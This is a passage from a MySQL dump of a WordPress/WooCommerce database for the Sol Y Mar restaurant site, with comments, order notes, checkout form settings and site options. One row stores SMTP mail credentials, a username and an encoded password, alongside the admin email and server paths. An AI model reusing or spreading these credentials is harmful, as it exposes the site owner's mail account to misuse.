15:12:14','Great!',0,'1','','comment',0,0),(1255,3677,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-23 14:17:24','2020-12-23 13:17:24','Unpaid order cancelled - time limit reached. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(1256,3678,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-23 19:18:35','2020-12-23 18:18:35','Unpaid order cancelled - time limit reached. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(1257,3679,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-24 12:26:57','2020-12-24 11:26:57','IPN payment completed',0,'1','WooCommerce','order_note',0,0),(1258,3679,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-24 12:26:57','2020-12-24 11:26:57','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(1259,3687,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-24 15:30:21','2020-12-24 14:30:21','IPN payment completed',0,'1','WooCommerce','order_note',0,0),(1273,3770,'linda_steele','lindaaa_steele@mail.com','','217.24.25.23','2018-08-23 12:23:47','2018-08-23 12:23:47','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1275,3770,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 12:25:57','2018-08-23 12:25:57','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus.',0,'1','','comment',0,0),(1276,3770,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 12:26:29','2018-08-23 12:26:29','Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus nullam quis ante. ',0,'1','','comment',0,0),(1277,1670,'Linda Owens','linda-owens@example.com','','217.24.25.23','2018-08-23 10:21:56','2018-08-23 10:21:56','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1278,1670,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 10:25:19','2018-08-23 10:25:19','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem. Maecenas nec odio et ante tincidunt tempus.',0,'1','','comment',0,0),(1279,1670,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 10:28:24','2018-08-23 10:28:24','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus.',0,'1','','comment',0,0),(1280,1671,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 12:36:45','2018-08-23 12:36:45','Curabitur ullamcorper ultricies nisi. Nam eget dui. Etiam rhoncus. Maecenas tempus, tellus eget condimentum rhoncus, sem quam semper libero, sit amet adipiscing sem neque sed ipsum. Nam quam nunc, blandit vel, luctus pulvinar, hendrerit id, lorem.',0,'1','','comment',0,0),(1281,1671,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 12:37:24','2018-08-23 12:37:24','Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus nullam quis ante.',0,'1','','comment',0,0),(1282,1671,'linda_steele','lindaaa_steele@mail.com','','217.24.25.23','2018-08-23 12:37:43','2018-08-23 12:37:43','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1283,1677,'Kalli Brener','k.brener@example.com','','217.24.25.23','2018-08-23 12:35:01','2018-08-23 12:35:01','Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus nullam quis ante.',0,'1','','comment',0,0),(1284,1677,'Mildred Burns','mildred-82@example.com','','217.24.25.23','2018-08-23 12:35:44','2018-08-23 12:35:44','Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Aenean commodo ligula eget dolor. Aenean massa. Cum sociis Theme natoque penatibus et magnis dis parturient montes.',0,'1','','comment',0,0),(1260,3687,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-24 15:30:21','2020-12-24 14:30:21','Order status changed from Pending payment to Processing.',0,'1','WooCommerce','order_note',0,0),(1261,3686,'WooCommerce','woocommerce@ristorantesolymar.it','','','2020-12-24 16:05:37','2020-12-24 15:05:37','Unpaid order cancelled - time limit reached. Order status changed from Pending payment to Cancelled.',0,'1','WooCommerce','order_note',0,0),(1272,1,'A WordPress Commenter','wapuu@wordpress.example','https://wordpress.org/','','2018-07-25 08:07:57','2018-07-25 08:07:57','Hi, this is a comment.\nTo get started with moderating, editing, and deleting comments, please visit the Comments screen in the dashboard.\nCommenter avatars come from <a href=\"https://gravatar.com\" rel=\"nofollow ugc\">Gravatar</a>.',0,'1','','comment',0,0);
/*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_links`
--

DROP TABLE IF EXISTS `wp_links`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_links` (
  `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `link_url` varchar(255) NOT NULL DEFAULT '',
  `link_name` varchar(255) NOT NULL DEFAULT '',
  `link_image` varchar(255) NOT NULL DEFAULT '',
  `link_target` varchar(25) NOT NULL DEFAULT '',
  `link_description` varchar(255) NOT NULL DEFAULT '',
  `link_visible` varchar(20) NOT NULL DEFAULT 'Y',
  `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1',
  `link_rating` int(11) NOT NULL DEFAULT '0',
  `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `link_rel` varchar(255) NOT NULL DEFAULT '',
  `link_notes` mediumtext NOT NULL,
  `link_rss` varchar(255) NOT NULL DEFAULT '',
  PRIMARY KEY (`link_id`),
  KEY `link_visible` (`link_visible`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_links`
--

LOCK TABLES `wp_links` WRITE;
/*!40000 ALTER TABLE `wp_links` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_links` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mail_bank`
--

DROP TABLE IF EXISTS `wp_mail_bank`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_mail_bank` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `type` varchar(100) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `parent_id` int(11) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=6 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mail_bank`
--

LOCK TABLES `wp_mail_bank` WRITE;
/*!40000 ALTER TABLE `wp_mail_bank` DISABLE KEYS */;
INSERT INTO `wp_mail_bank` VALUES (1,'email_configuration',0),(2,'email_logs',0),(3,'settings',0),(4,'collation_type',0),(5,'roles_and_capabilities',0);
/*!40000 ALTER TABLE `wp_mail_bank` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mail_bank_email_logs`
--

DROP TABLE IF EXISTS `wp_mail_bank_email_logs`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_mail_bank_email_logs` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `email_data` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mail_bank_email_logs`
--

LOCK TABLES `wp_mail_bank_email_logs` WRITE;
/*!40000 ALTER TABLE `wp_mail_bank_email_logs` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_mail_bank_email_logs` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_mail_bank_meta`
--

DROP TABLE IF EXISTS `wp_mail_bank_meta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_mail_bank_meta` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `meta_id` int(11) NOT NULL,
  `meta_key` varchar(255) COLLATE utf8mb4_unicode_520_ci NOT NULL,
  `meta_value` longtext COLLATE utf8mb4_unicode_520_ci NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM AUTO_INCREMENT=4 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_520_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_mail_bank_meta`
--

LOCK TABLES `wp_mail_bank_meta` WRITE;
/*!40000 ALTER TABLE `wp_mail_bank_meta` DISABLE KEYS */;
INSERT INTO `wp_mail_bank_meta` VALUES (1,1,'email_configuration','a:22:{s:13:\"email_address\";s:34:\"notifiche@www.ristorantesolymar.it\";s:8:\"reply_to\";s:0:\"\";s:2:\"cc\";s:0:\"\";s:3:\"bcc\";s:0:\"\";s:7:\"headers\";s:0:\"\";s:11:\"mailer_type\";s:4:\"smtp\";s:15:\"mailgun_api_key\";s:0:\"\";s:19:\"mailgun_domain_name\";s:0:\"\";s:25:\"sender_name_configuration\";s:8:\"override\";s:11:\"sender_name\";s:32:\"Sol Y Mar, ristorante a Riccione\";s:24:\"from_email_configuration\";s:8:\"override\";s:12:\"sender_email\";s:34:\"notifiche@www.ristorantesolymar.it\";s:8:\"hostname\";s:17:\"in-v3.mailjet.com\";s:4:\"port\";i:25;s:8:\"enc_type\";s:4:\"none\";s:9:\"auth_type\";s:5:\"login\";s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";s:8:\"username\";s:32:\"8a6cd27d27a3d3e4aa080185d0a1edc0\";s:14:\"automatic_mail\";s:1:\"1\";s:8:\"password\";s:44:\"ZWEzNDkxN2ZhYzE4MmQ3OWUzMTFlYjgyOTNiMWE2YWE=\";s:12:\"redirect_uri\";s:55:\"http://www.ristorantesolymar.it/wp-admin/admin-ajax.php\";}'),(2,3,'settings','a:4:{s:10:\"debug_mode\";s:6:\"enable\";s:26:\"remove_tables_at_uninstall\";s:6:\"enable\";s:18:\"monitor_email_logs\";s:6:\"enable\";s:14:\"fetch_settings\";s:15:\"individual_site\";}'),(3,5,'roles_and_capabilities','a:10:{s:22:\"roles_and_capabilities\";s:11:\"1,1,1,0,0,0\";s:27:\"show_mail_bank_top_bar_menu\";s:6:\"enable\";s:30:\"others_full_control_capability\";s:1:\"0\";s:24:\"administrator_privileges\";s:19:\"1,1,1,1,1,1,1,1,1,1\";s:17:\"author_privileges\";s:19:\"0,0,1,0,0,0,0,0,0,0\";s:17:\"editor_privileges\";s:19:\"0,0,1,0,0,0,1,0,0,0\";s:22:\"contributor_privileges\";s:19:\"0,0,0,0,0,0,1,0,0,0\";s:21:\"subscriber_privileges\";s:19:\"0,0,0,0,0,0,0,0,0,0\";s:22:\"other_roles_privileges\";s:19:\"0,0,0,0,0,0,0,0,0,0\";s:12:\"capabilities\";a:7:{i:0;s:14:\"manage_options\";i:1;s:12:\"edit_plugins\";i:2;s:10:\"edit_posts\";i:3;s:13:\"publish_posts\";i:4;s:13:\"publish_pages\";i:5;s:10:\"edit_pages\";i:6;s:4:\"read\";}}');
/*!40000 ALTER TABLE `wp_mail_bank_meta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nm_checkoutmeta`
--

DROP TABLE IF EXISTS `wp_nm_checkoutmeta`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_nm_checkoutmeta` (
  `cofm_id` int(5) NOT NULL AUTO_INCREMENT,
  `aviary_api_key` varchar(15) DEFAULT NULL,
  `billing_meta` mediumtext,
  `shipping_meta` mediumtext,
  `order_meta` mediumtext,
  PRIMARY KEY (`cofm_id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nm_checkoutmeta`
--

LOCK TABLES `wp_nm_checkoutmeta` WRITE;
/*!40000 ALTER TABLE `wp_nm_checkoutmeta` DISABLE KEYS */;
INSERT INTO `wp_nm_checkoutmeta` VALUES (1,NULL,'[{\"type\":\"text\",\"title\":\"Nome (acquirente)\",\"data_name\":\"billing_first_name\",\"description\":\"Nome (di chi acquista \\/ prenota)\",\"error_message\":\"Si prega di inserire il nome di chi prenota\",\"max_length\":\"\",\"min_length\":\"\",\"required\":\"on\",\"class\":\"form-row,form-row-first\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"text\",\"title\":\"Cognome\",\"data_name\":\"billing_last_name\",\"description\":\"Cognome (di chi acquista \\/ prenota)\",\"error_message\":\"Si prega di inserire il cognome\",\"max_length\":\"\",\"min_length\":\"\",\"required\":\"on\",\"class\":\"form-row,form-row-last\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"text\",\"title\":\"Email\",\"data_name\":\"billing_email\",\"description\":\"Inserire email dove riceverai ricevuta dell\\\\\'acquisto\\/prenotazione\",\"error_message\":\"\",\"max_length\":\"\",\"min_length\":\"\",\"required\":\"on\",\"class\":\"form-row,form-row-first\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"text\",\"title\":\"Cellulare\",\"data_name\":\"billing_phone\",\"description\":\"Inserire un numero di telefono Cellulare (raggiungibile)\",\"error_message\":\"Si prega di inserire il telefono\",\"max_length\":\"20\",\"min_length\":\"7\",\"required\":\"on\",\"class\":\"form-row,form-row-last\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"text\",\"title\":\"Indirizzo\",\"data_name\":\"billing_address_1\",\"description\":\"Indirizzo\",\"error_message\":\"\",\"max_length\":\"\",\"min_length\":\"\",\"required\":\"\",\"class\":\"form-row,form-row-wide,address-field\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"text\",\"title\":\"Citt\\u00e0\",\"data_name\":\"billing_city\",\"description\":\"Citt\\u00e0\",\"error_message\":\"\",\"max_length\":\"\",\"min_length\":\"\",\"required\":\"\",\"class\":\"form-row,form-row-wide,address-field\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"}]',NULL,'[{\"type\":\"section\",\"title\":\"\",\"description\":\"Da compilare in caso di prenotazione tavolo: indicare il numero di adulti, bambini e ragazzi.\\nSe stai regalando una cena puoi continuare oltre..\",\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"select\",\"title\":\"Quanti adulti?\",\"data_name\":\"order_numero_adulti\",\"description\":\"Numero Persone Adulte\",\"error_message\":\"\",\"options\":[{\"option\":\"1\",\"price\":\"\"},{\"option\":\"2\",\"price\":\"\"},{\"option\":\"3\",\"price\":\"\"},{\"option\":\"4\",\"price\":\"\"},{\"option\":\"5\",\"price\":\"\"},{\"option\":\"6\",\"price\":\"\"},{\"option\":\"6\",\"price\":\"\"},{\"option\":\"7\",\"price\":\"\"},{\"option\":\"8\",\"price\":\"\"}],\"taxable\":\"\",\"calculate\":\"fixed\",\"selected\":\"1\",\"multiple\":\"\",\"required\":\"\",\"class\":\"\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"order_bambini-fino-6-anni\",\"operators\":\"is\",\"element_values\":\"0\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"select\",\"title\":\"Numero bambini fino a 6 anni\",\"data_name\":\"order_bambini-fino-6-anni\",\"description\":\"Inserire numero bimbi fino a 6 anni\",\"error_message\":\"\",\"options\":[{\"option\":\"0\",\"price\":\"\"},{\"option\":\"1\",\"price\":\"\"},{\"option\":\"2\",\"price\":\"\"},{\"option\":\"3\",\"price\":\"\"},{\"option\":\"4\",\"price\":\"\"},{\"option\":\"5\",\"price\":\"\"}],\"taxable\":\"\",\"calculate\":\"fixed\",\"selected\":\"0\",\"multiple\":\"\",\"required\":\"\",\"class\":\"\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"select\",\"title\":\"Numero ragazzi fino a 14 anni\",\"data_name\":\"order_numero_ragazzi_fino_14_anni\",\"description\":\"Seleziona quanti ragazzi tra 6 e 16 anni\",\"error_message\":\"\",\"options\":[{\"option\":\"0\",\"price\":\"\"},{\"option\":\"1\",\"price\":\"\"},{\"option\":\"2\",\"price\":\"\"},{\"option\":\"3\",\"price\":\"\"},{\"option\":\"4\",\"price\":\"\"},{\"option\":\"5\",\"price\":\"\"},{\"option\":\"6\",\"price\":\"\"}],\"taxable\":\"\",\"calculate\":\"fixed\",\"selected\":\"0\",\"multiple\":\"\",\"required\":\"\",\"class\":\"\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"\",\"operators\":\"is\",\"element_values\":\"\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"},{\"type\":\"select\",\"title\":\"Numero ragazzi dai 15 anni in su\",\"data_name\":\"order_numero_ragazzi_dai_15_anni_in_su\",\"description\":\"Seleziona numero ragazzi sopra i 15 anni\",\"error_message\":\"\",\"options\":[{\"option\":\"0\",\"price\":\"\"},{\"option\":\"1\",\"price\":\"\"},{\"option\":\"2\",\"price\":\"\"},{\"option\":\"3\",\"price\":\"\"},{\"option\":\"4\",\"price\":\"\"},{\"option\":\"5\",\"price\":\"\"}],\"taxable\":\"\",\"calculate\":\"fixed\",\"selected\":\"0\",\"multiple\":\"\",\"required\":\"\",\"class\":\"\",\"width\":\"\",\"logic\":\"\",\"conditions\":{\"visibility\":\"Show\",\"bound\":\"All\",\"rules\":[{\"elements\":\"order_numero_ragazzi_fino_14_anni\",\"operators\":\"is\",\"element_values\":\"0\"}]},\"product_visibility\":\"\",\"category_visibility\":\"\",\"user_visibility\":\"\"}]');
/*!40000 ALTER TABLE `wp_nm_checkoutmeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_offline_giftcard`
--

DROP TABLE IF EXISTS `wp_offline_giftcard`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_offline_giftcard` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `to` text,
  `from` text,
  `message` text,
  `amount` text,
  `coupon` text,
  `template` text,
  `mail` text,
  `date` datetime DEFAULT NULL,
  `schedule` date DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_offline_giftcard`
--

LOCK TABLES `wp_offline_giftcard` WRITE;
/*!40000 ALTER TABLE `wp_offline_giftcard` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_offline_giftcard` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_options`
--

DROP TABLE IF EXISTS `wp_options`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_options` (
  `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `option_name` varchar(191) DEFAULT NULL,
  `option_value` longtext NOT NULL,
  `autoload` varchar(20) NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`option_id`),
  UNIQUE KEY `option_name` (`option_name`),
  KEY `autoload` (`autoload`)
) ENGINE=MyISAM AUTO_INCREMENT=332409 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_options`
--

LOCK TABLES `wp_options` WRITE;
/*!40000 ALTER TABLE `wp_options` DISABLE KEYS */;
INSERT INTO `wp_options` VALUES (1,'siteurl','https://www.ristorantesolymar.it/vecchio','yes'),(2,'home','https://www.ristorantesolymar.it/vecchio','yes'),(3,'blogname','Sol Y Mar','yes'),(4,'blogdescription','ristorante a Riccione','yes'),(5,'users_can_register','0','yes'),(6,'admin_email','webmaster@baldisserri.com','yes'),(7,'start_of_week','1','yes'),(8,'use_balanceTags','0','yes'),(9,'use_smilies','1','yes'),(10,'require_name_email','1','yes'),(11,'comments_notify','1','yes'),(12,'posts_per_rss','10','yes'),(13,'rss_use_excerpt','0','yes'),(14,'mailserver_url','mail.example.com','yes'),(15,'mailserver_login','login@example.com','yes'),(16,'mailserver_pass','password','yes'),(17,'mailserver_port','110','yes'),(18,'default_category','1','yes'),(19,'default_comment_status','open','yes'),(20,'default_ping_status','open','yes'),(21,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','j F Y','yes'),(24,'time_format','G:i','yes'),(25,'links_updated_date_format','j F Y G:i','yes'),(26,'comment_moderation','0','yes'),(27,'moderation_notify','1','yes'),(28,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(30,'hack_file','0','yes'),(31,'blog_charset','UTF-8','yes'),(32,'moderation_keys','','no'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(37,'comment_max_links','2','yes'),(38,'gmt_offset','','yes'),(39,'default_email_category','1','yes'),(40,'recently_edited','a:5:{i:0;s:75:\"/home/quizit12/www.ristorantesolymar.it/wp-content/themes/sydney/single.php\";i:2;s:74:\"/home/quizit12/www.ristorantesolymar.it/wp-content/themes/sydney/style.css\";i:3;s:79:\"/home/quizit12/www.ristorantesolymar.it/wp-content/themes/impressive/header.php\";i:4;s:78:\"/home/quizit12/www.ristorantesolymar.it/wp-content/themes/impressive/style.css\";i:5;s:88:\"/home/quizit12/www.ristorantesolymar.it/wp-content/themes/Impressive-child/functions.php\";}','no'),(45,'comment_registration','0','yes'),(46,'html_type','text/html','yes'),(47,'use_trackback','0','yes'),(48,'default_role','subscriber','yes'),(49,'db_version','49752','yes'),(50,'uploads_use_yearmonth_folders','1','yes'),(51,'upload_path','','yes'),(52,'blog_public','1','yes'),(53,'default_link_category','2','yes'),(54,'show_on_front','page','yes'),(55,'tag_base','','yes'),(56,'show_avatars','1','yes'),(57,'avatar_rating','G','yes'),(58,'upload_url_path','','yes'),(59,'thumbnail_size_w','150','yes'),(60,'thumbnail_size_h','150','yes'),(61,'thumbnail_crop','1','yes'),(62,'medium_size_w','300','yes'),(63,'medium_size_h','300','yes'),(64,'avatar_default','mystery','yes'),(65,'large_size_w','1024','yes'),(66,'large_size_h','1024','yes'),(67,'image_default_link_type','file','yes'),(68,'image_default_size','','yes'),(69,'image_default_align','','yes'),(70,'close_comments_for_old_posts','0','yes'),(71,'close_comments_days_old','14','yes'),(72,'thread_comments','1','yes'),(73,'thread_comments_depth','5','yes'),(74,'page_comments','0','yes'),(75,'comments_per_page','50','yes'),(76,'default_comments_page','newest','yes'),(77,'comment_order','asc','yes'),(78,'sticky_posts','a:0:{}','yes'),(79,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_text','a:6:{i:1;a:0:{}i:2;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:54:\"Ristorante Sol Y Mar | Lungomare D\'Annunzio | Riccione\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:3;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:107:\"<p style=\"font-size: 13px; line-height: 25px;\">Lorem ipsum dolor sit amet, consectetur adipiscing elit.</p>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:5;a:4:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:323:\"<h6 style=\"text-align: center;\"><a href=\"http://attika.mikado-themes.com/food-drinks-menu/\">attika</a></h6><a href=\"http://attika.mikado-themes.com/food-drinks-menu/\">fine</a>\r\n<a href=\"http://attika.mikado-themes.com/food-drinks-menu/\">dining</a>\r\n<a href=\"http://attika.mikado-themes.com/food-drinks-menu/\">restaurant</a>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}i:6;a:4:{s:5:\"title\";s:1:\"|\";s:4:\"text\";s:477:\"<p style=\"color: #111111; font-size: 13px; line-height: 25px;\"><a href=\"https://www.google.com/maps/place/35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA/@40.8140055,-74.3332124,17z/data=!4m13!1m7!3m6!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!2s35+Rainbow+Ridge+Dr,+Livingston,+NJ+07039,+USA!3b1!8m2!3d40.8140015!4d-74.3310237!3m4!1s0x89c3a997640392e1:0xe5e9cdfe2711609c!8m2!3d40.8140015!4d-74.3310237\" target=\"_blank\" rel=\"noopener\">Rainbow Ridge Dr street 35 NY City, NY</a></p>\";s:6:\"filter\";b:1;s:6:\"visual\";b:1;}s:12:\"_multiwidget\";i:1;}','yes'),(81,'widget_rss','a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(82,'uninstall_plugins','a:9:{s:21:\"mailin/sendinblue.php\";a:2:{i:0;s:11:\"SIB_Manager\";i:1;s:9:\"uninstall\";}s:53:\"child-theme-configurator/child-theme-configurator.php\";s:22:\"chld_thm_cfg_uninstall\";s:51:\"woo-stickers-by-webline/woo-stickers-by-webline.php\";a:2:{i:0;s:15:\"wooStickerHooks\";i:1;s:26:\"wooStickerHooks_deactivate\";}s:51:\"woocommerce-gift-coupon/woocommerce-gift-coupon.php\";s:33:\"woocommerce_gift_coupon_uninstall\";s:33:\"instagram-feed/instagram-feed.php\";s:22:\"sb_instagram_uninstall\";s:33:\"classic-editor/classic-editor.php\";a:2:{i:0;s:14:\"Classic_Editor\";i:1;s:9:\"uninstall\";}s:23:\"elementor/elementor.php\";a:2:{i:0;s:21:\"Elementor\\Maintenance\";i:1;s:9:\"uninstall\";}s:28:\"error-log-monitor/plugin.php\";s:14:\"__return_false\";s:37:\"error-log-viewer/error-log-viewer.php\";s:18:\"rrrlgvwr_uninstall\";}','no'),(83,'timezone_string','Europe/Rome','yes'),(84,'page_for_posts','0','yes'),(85,'page_on_front','3040','yes'),(86,'default_post_format','0','yes'),(87,'link_manager_enabled','0','yes'),(88,'initial_db_version','31536','yes'),(89,'wp_user_roles','a:9:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:163:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7: